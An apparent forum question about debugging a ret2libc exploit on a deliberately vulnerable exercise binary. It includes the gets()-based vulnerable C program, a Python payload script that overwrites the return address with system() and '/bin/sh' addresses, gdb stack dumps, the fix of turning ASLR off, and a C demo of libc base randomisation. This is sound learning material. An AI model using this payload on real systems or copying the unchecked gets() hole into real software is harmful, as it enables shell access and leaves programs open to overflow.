Segmentation Fault ret2libc attack

I am trying to perform a ret2libc attack. To do this, I need to call system() from libc and pass it the argument "/bin/sh" (the address of the "/bin/sh" string). Unfortunately I get a "Segmentation Fault" every time.

Can anyone tell me why? If I look at the stack, everything looks fine (to me).

Here is my source code:

    /* headers added: printf/fflush/gets live in stdio.h, _exit in unistd.h.
       gets() is only declared by glibc for pre-C11 standards (e.g. -std=gnu99). */
    #include <stdio.h>
    #include <unistd.h>

    void getpath()
    {
      char buffer[64];
      unsigned int ret;

      printf("input path please: "); fflush(stdout);

      /* no length check: input longer than the buffer overwrites the saved rbp
         and the saved return address that follow it on the stack */
      gets(buffer);

      /* only the low 32 bits of the return address are kept in ret (cast keeps
         the original truncating behaviour without an implicit-conversion warning) */
      ret = (unsigned int)(unsigned long)__builtin_return_address(0);

      /* rejects return addresses that look like 32-bit stack addresses */
      if((ret & 0xbf000000) == 0xbf000000) {
          printf("bzzzt (%p)\n", ret);
          _exit(1);
      }

      printf("got path %s\n", buffer);
    }

    int main(int argc, char **argv)
    {
      getpath();
    }

My exploit code is as follows:

    import struct
    import sys

    # 88 bytes of filler: buffer, padding and saved rbp, up to the saved return address
    offset = b"A" * 88
    # address of system() as read from gdb (only valid while ASLR is off)
    system_address = struct.pack("q", 0x7ffff7a60510)
    nop = b"\x90" * 4
    # address of the "/bin/sh" string inside libc, also read from gdb
    bin_sh_address = struct.pack("q", 0x7ffff7b9b3f3)

    #libc_start = 0x7ffff7a1e000
    #sh_offset = 0x17d3f3
    #libc_start plus sh_offset = 0x7ffff7b9b3f3

    # write raw bytes so the script runs on Python 3 as well as Python 2 (the terminal
    # session used Python 2's print, which appended the newline that gets() reads)
    sys.stdout.buffer.write(offset + system_address + nop + bin_sh_address + b"\n")

Below are my terminal commands:

>>> r < ./text
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/Desktop/ExerciseExploit/stack6 < ./text

Breakpoint 2, getpath () at stack6.c:11
11    printf("input path please: "); fflush(stdout);
>>> i r rsp rbp
rsp            0x7fffffffe160   0x7fffffffe160
rbp            0x7fffffffe1b0   0x7fffffffe1b0
>>> x/40xw $rsp
0x7fffffffe160: 0x00000000  0x00000000  0x00f0b2ff  0x00000000
0x7fffffffe170: 0x000000c2  0x00000000  0xffffe1a6  0x00007fff
0x7fffffffe180: 0x00000001  0x00000000  0xf7abe905  0x00007fff
0x7fffffffe190: 0x00000001  0x00000000  0x5555485d  0x00005555
0x7fffffffe1a0: 0xf7de70e0  0x00007fff  0x00000000  0x00000000
0x7fffffffe1b0: 0xffffe1d0  0x00007fff  0x555547fd  0x00005555
0x7fffffffe1c0: 0xffffe2b8  0x00007fff  0x00000000  0x00000001
0x7fffffffe1d0: 0x55554810  0x00005555  0xf7a3fa87  0x00007fff
0x7fffffffe1e0: 0x00000000  0x00000000  0xffffe2b8  0x00007fff
0x7fffffffe1f0: 0x00040000  0x00000001  0x555547e4  0x00005555
>>> n
input path please: 13     gets(buffer);
>>> n

Breakpoint 1, getpath () at stack6.c:15
15    ret = __builtin_return_address(0);
>>> i r rsp rbp
rsp            0x7fffffffe160   0x7fffffffe160
rbp            0x7fffffffe1b0   0x7fffffffe1b0
>>> x/40xw $rsp
0x7fffffffe160: 0x41414141  0x41414141  0x41414141  0x41414141
0x7fffffffe170: 0x41414141  0x41414141  0x41414141  0x41414141
0x7fffffffe180: 0x41414141  0x41414141  0x41414141  0x41414141
0x7fffffffe190: 0x41414141  0x41414141  0x41414141  0x41414141
0x7fffffffe1a0: 0x41414141  0x41414141  0x41414141  0x41414141
0x7fffffffe1b0: 0x41414141  0x41414141  0xf7a60510  0x00007fff
0x7fffffffe1c0: 0x90909090  0xf7b9b3f3  0x00007fff  0x00000000
0x7fffffffe1d0: 0x55554810  0x00005555  0xf7a3fa87  0x00007fff
0x7fffffffe1e0: 0x00000000  0x00000000  0xffffe2b8  0x00007fff
0x7fffffffe1f0: 0x00040000  0x00000001  0x555547e4  0x00005555
>>> n
17    if((ret & 0xbf000000) == 0xbf000000) {
>>> n
22    printf("got path %s\n", buffer);
>>> 

Error output:

root@kali:~/Desktop/ExerciseExploit# python exploit6.py | ./stack6
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAA���
Segmentation fault

[closed]

Fix:

ASLR was not disabled -> disable ASLR: echo 0 > /proc/sys/kernel/randomize_va_space
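As an added illustration of that fix (not code from the original post), the following C program shows why addresses copied out of gdb stop working once ASLR is on: libc's load base changes from run to run, while the offset of system() from that base stays the same. It walks the loaded ELF objects with dl_iterate_phdr() and reads randomize_va_space; it assumes Linux and a PIE build (the default for current gcc), so that &system resolves to the libc function rather than to a PLT stub in the executable.

```c
#define _GNU_SOURCE
#include <link.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Constructed example: find the loaded ELF object that contains an address. */
struct probe { uintptr_t target; uintptr_t base; };
static int find_object(struct dl_phdr_info *info, size_t size, void *data) {
    struct probe *p = data; (void)size;
    for (int i = 0; i < info->dlpi_phnum; i++) {
        const ElfW(Phdr) *ph = &info->dlpi_phdr[i];
        if (ph->p_type != PT_LOAD) continue;
        uintptr_t start = info->dlpi_addr + ph->p_vaddr;
        if (p->target >= start && p->target < start + ph->p_memsz) {
            p->base = info->dlpi_addr;   /* load base of this object */
            return 1;                    /* non-zero stops the walk */
        }
    }
    return 0;
}

/* Load base of libc (the object holding system()); 0 if not found. Changes per run under ASLR. */
uintptr_t libc_base(void) {
    struct probe p = { (uintptr_t)system, 0 };
    dl_iterate_phdr(find_object, &p);
    return p.base;
}

/* Offset of system() from libc's base: identical inside gdb and outside it. */
uintptr_t system_offset(void) {
    uintptr_t base = libc_base();
    return base ? (uintptr_t)system - base : 0;
}

/* /proc/sys/kernel/randomize_va_space: 0 = off, 2 = full; -1 if unreadable. */
int aslr_setting(void) {
    FILE *f = fopen("/proc/sys/kernel/randomize_va_space", "r"); int v = -1;
    if (f && fscanf(f, "%d", &v) != 1) v = -1;
    if (f) fclose(f);
    return v;
}

int main(void) {
    printf("randomize_va_space = %d\n", aslr_setting());
    printf("libc base          = %#lx\n", (unsigned long)libc_base());
    printf("system() offset    = %#lx\n", (unsigned long)system_offset());
    return 0;
}
```

Run it two or three times: with randomize_va_space at 2 the base differs on every run, with it at 0 it repeats, and the offset never changes either way.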